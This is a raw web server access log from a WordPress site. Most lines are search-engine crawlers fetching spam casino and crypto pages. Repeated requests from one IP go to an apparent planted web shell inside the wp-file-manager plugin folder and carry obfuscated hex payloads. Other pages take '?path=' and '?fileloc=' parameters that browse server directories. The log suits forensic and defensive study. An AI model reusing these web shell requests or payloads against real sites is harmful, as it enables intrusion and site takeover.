17.22.237.50 - - [26/Apr/2026:11:10:10 +0300] "GET /exploring-the-allure-of-high-stakes-casino-games-for-thrill-seekers/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/uploads/2023/04 HTTP/1.1" 200 4278 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:10:09 +0300] "GET /?detail/775512897 HTTP/1.1" 200 30125 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:10:11 +0300] "GET /?detail/915734750 HTTP/1.1" 200 29862 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:08:13 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343439332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139303839332q3939346630366231306539373961643833343332336530646137353530363732222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:10:14 +0300] "GET /shop/mistold/azollaceae08304743022.html HTTP/1.1" 200 30784 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
51.89.129.0 - - [26/Apr/2026:11:10:18 +0300] "GET /shop/sanpan/eumenes054288947058.html HTTP/2" 200 8040 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:10:17 +0300] "GET /?detail/994086511 HTTP/1.1" 200 29362 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.15.77 - - [26/Apr/2026:11:10:19 +0300] "GET /exploring-the-differences-between-online-and-7/?path=/var/www/vhosts/miroglu.net/.cagefs/var/php/apm HTTP/1.1" 200 6624 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
40.77.167.132 - - [26/Apr/2026:11:10:18 +0300] "GET /?sitemap237.xml HTTP/2" 200 38322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.73.162 - - [26/Apr/2026:11:10:21 +0300] "GET /?detail/562401109 HTTP/1.1" 200 29104 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.22.253.174 - - [26/Apr/2026:11:10:24 +0300] "GET /discovering-raydium-the-future-of-efficient-crypto-swaps/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/fileorganizer/main HTTP/1.1" 200 4360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:10:23 +0300] "GET /shop/largish/alveolar013585757702.html HTTP/1.1" 200 28961 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:10:24 +0300] "GET /?detail/525324965 HTTP/1.1" 200 28729 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:10:30 +0300] "GET /?prizes/34037929 HTTP/1.1" 200 28680 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:08:35 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343531352p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139303931352q3438633138373963313563623532313232336436346334353639373463316565222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:10:36 +0300] "GET /?detail/753521329 HTTP/1.1" 200 29761 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.23.73 - - [26/Apr/2026:11:10:37 +0300] "GET /an-in-depth-exploration-of-solscan-for-crypto-enthusiasts/?path=/var/www/vhosts/miroglu.net/.cagefs/var/run HTTP/1.1" 200 6898 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:10:38 +0300] "GET /?detail/541177285 HTTP/1.1" 200 29013 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.22.237.231 - - [26/Apr/2026:11:10:40 +0300] "GET /discover-the-power-of-bscscan-for-crypto-traders-10/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/themes HTTP/1.1" 200 4507 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.50 - - [26/Apr/2026:11:10:44 +0300] "GET /discover-why-dexscreener-is-the-best-dex-scanner-for-traders/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/kgsmi/languages HTTP/1.1" 200 4505 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:10:44 +0300] "GET /?detail/594423238 HTTP/1.1" 200 31112 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:10:46 +0300] "GET /?detail/95743525 HTTP/1.1" 200 30176 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.15.169 - - [26/Apr/2026:11:10:49 +0300] "GET /discover-the-exceptional-features-of-solscan-for-investors/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/elementor/modules/page-templates HTTP/1.1" 200 4320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:10:50 +0300] "GET /shop/disunite/preventable47291070095.html HTTP/1.1" 200 29424 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:08:57 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343533372p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139303933372q3435383136313638393830386333633534636136623361626534613832616262222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:10:58 +0300] "GET /?detail/447962160 HTTP/1.1" 200 29009 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.226.59 - - [26/Apr/2026:11:10:59 +0300] "GET /shop/retraxit/deject052298470168.html HTTP/2" 200 8044 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:11:01 +0300] "GET /?detail/110111606 HTTP/1.1" 200 31348 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.23.18 - - [26/Apr/2026:11:11:03 +0300] "GET /dexscreener-a-comprehensive-tool-for-traders-in-2026/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test/apacheasp HTTP/1.1" 200 6965 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.15.4 - - [26/Apr/2026:11:11:05 +0300] "GET /exploring-the-allure-of-high-stakes-casino-games-for-thrill-seekers/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/list HTTP/1.1" 200 4405 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:11:06 +0300] "GET /shop/mesocarp/villanette423629139688.html HTTP/1.1" 200 28513 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.219.246 - - [26/Apr/2026:11:11:07 +0300] "GET /choosing-raydium-the-ultimate-solution-for-seamless-swaps/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-compat HTTP/1.1" 200 4181 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:11:14 +0300] "GET /shop/fimbrial/hyperbola301316543244.html HTTP/1.1" 200 29056 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:16 +0300] "GET /?detail/799583338 HTTP/1.1" 200 28814 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:09:19 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343535392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139303935392q3462663634346237376231643437343137663935346461343533363036643834222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:11:20 +0300] "GET /shop/testicardines/jobation424233998199.html HTTP/1.1" 200 29136 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [26/Apr/2026:11:11:21 +0300] "GET /shop/kyrielle/lilach20511940792.html HTTP/1.1" 200 29325 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:26 +0300] "GET /?detail/828508698 HTTP/1.1" 200 29198 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:29 +0300] "GET /?detail/774777256 HTTP/1.1" 200 29845 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:31 +0300] "GET /?detail/214988752 HTTP/1.1" 200 29861 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:35 +0300] "GET /?detail/201026663 HTTP/1.1" 200 28395 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:36 +0300] "GET /?detail/823877722 HTTP/1.1" 200 30193 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.183.216 - - [26/Apr/2026:11:11:39 +0300] "GET /shop/mulligatawny/chivied06128185929.html HTTP/2" 200 8036 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [26/Apr/2026:11:09:40 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343538302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139303938302q6233333461643137633264353035666433356632623039333161346263633537222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [26/Apr/2026:11:11:40 +0300] "GET /shop/consolation/modify762915007776.html HTTP/1.1" 200 28574 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:11:43 +0300] "GET /?detail/29895670 HTTP/1.1" 200 28616 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:11:46 +0300] "GET /?detail/331871753 HTTP/1.1" 200 30141 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:47 +0300] "GET /shop/uppermost/confronted7579673487.html HTTP/1.1" 200 28591 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:49 +0300] "GET /shop/ablactate/smither1513575385.html HTTP/1.1" 200 29514 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:51 +0300] "GET /?detail/70430245 HTTP/1.1" 200 28147 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:11:53 +0300] "GET /?detail/302419399 HTTP/1.1" 200 29359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:11:55 +0300] "GET /?detail/313693582 HTTP/1.1" 200 30359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:11:57 +0300] "GET /shop/arrowshaped/headachy462327573025.html HTTP/1.1" 200 28655 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:12:00 +0300] "GET /?detail/462500506 HTTP/1.1" 200 30245 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:10:02 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343630322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313030322q3061323464656134626266633735353839356339633339336535366366626236222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
185.191.171.3 - - [26/Apr/2026:11:12:03 +0300] "GET /casino-en-ligne-qui-donne-de-l-argent-gratuits/ HTTP/1.1" 200 10054 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:12:07 +0300] "GET /?detail/640324454 HTTP/1.1" 200 30862 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:12:08 +0300] "GET /?detail/921799456 HTTP/1.1" 200 28913 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:12:10 +0300] "GET /?detail/566742294 HTTP/1.1" 200 29893 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.168.73 - - [26/Apr/2026:11:12:12 +0300] "GET /shop/gregorian/liabilities002357540366.html HTTP/2" 200 8042 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:12:11 +0300] "GET /?detail/250775921 HTTP/1.1" 200 32508 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:12:12 +0300] "GET /?detail/40534612 HTTP/1.1" 200 28774 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:12:14 +0300] "GET /shop/locky/archership231254928476.html HTTP/1.1" 200 28909 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:12:16 +0300] "GET /shop/lyophilize/bedkey53297397953.html HTTP/1.1" 200 30042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.15.205 - - [26/Apr/2026:11:12:18 +0300] "GET /discover-the-advantages-of-using-ledger-live-for-crypto-5/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/woocommerce_TAG HTTP/1.1" 200 4360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:12:18 +0300] "GET /?detail/919581795 HTTP/1.1" 200 30428 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.19.90 - - [26/Apr/2026:11:12:20 +0300] "GET /discovering-the-benefits-of-raydium-swap-in-crypto-trading/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages/es_ES-93882e8f9976382d7f724ac595ed7151.json&path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/languages HTTP/1.1" 200 4137 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.164 - - [26/Apr/2026:11:12:21 +0300] "GET /?detail/56316950 HTTP/1.1" 200 28682 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.236.142.3 - - [26/Apr/2026:11:12:22 +0300] "GET /bonanza-game-casino-kod-promocyjny-2026/ HTTP/1.1" 200 8505 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
185.216.113.70 - - [26/Apr/2026:11:10:23 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343632332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313032332q3161393731643066616530376331323762636565393561353664376539656230222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:12:22 +0300] "GET /?detail/856188787 HTTP/1.1" 200 29380 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.22.245.127 - - [26/Apr/2026:11:12:24 +0300] "GET /unlocking-the-secrets-of-casino-strategies-for-winning-big/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/css/dist/reusable-blocks HTTP/1.1" 200 4451 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.129 - - [26/Apr/2026:11:12:26 +0300] "GET /discover-the-comprehensive-benefits-of-safepal-wallet-2/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/post-author-biography/post-author-biography HTTP/1.1" 200 4332 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:11:12:25 +0300] "GET /?detail/651202689 HTTP/1.1" 200 28560 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.236.142.3 - - [26/Apr/2026:11:12:26 +0300] "GET /bonanza-game-casino-kod-promocyjny-2026/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/55ece37ba5f55f1032982f56b7fbfb48&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5508 "https://miroglu.net/bonanza-game-casino-kod-promocyjny-2026/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131"
66.249.73.162 - - [26/Apr/2026:11:12:27 +0300] "GET /?detail/212462203 HTTP/1.1" 200 29091 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.246.15.105 - - [26/Apr/2026:11:12:30 +0300] "GET /unlocking-the-secrets-behind-successful-casino-strategies/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content/themes/hello-elementor HTTP/1.1" 200 5213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.246.23.115 - - [26/Apr/2026:11:12:33 +0300] "GET /unleashing-the-power-of-dexscreener-for-traders-in-2026/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/img HTTP/1.1" 200 7187 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.22.253.167 - - [26/Apr/2026:11:12:35 +0300] "GET /discover-tronscan-your-guide-to-blockchain-insights/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/test HTTP/1.1" 200 8246 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
51.195.183.97 - - [26/Apr/2026:11:12:41 +0300] "GET /shop/escorted/aswing06779115473.html HTTP/2" 200 8022 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [26/Apr/2026:11:10:44 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343634342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313034342q3136616663646138646435666635343238623537323432616666316437333062222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
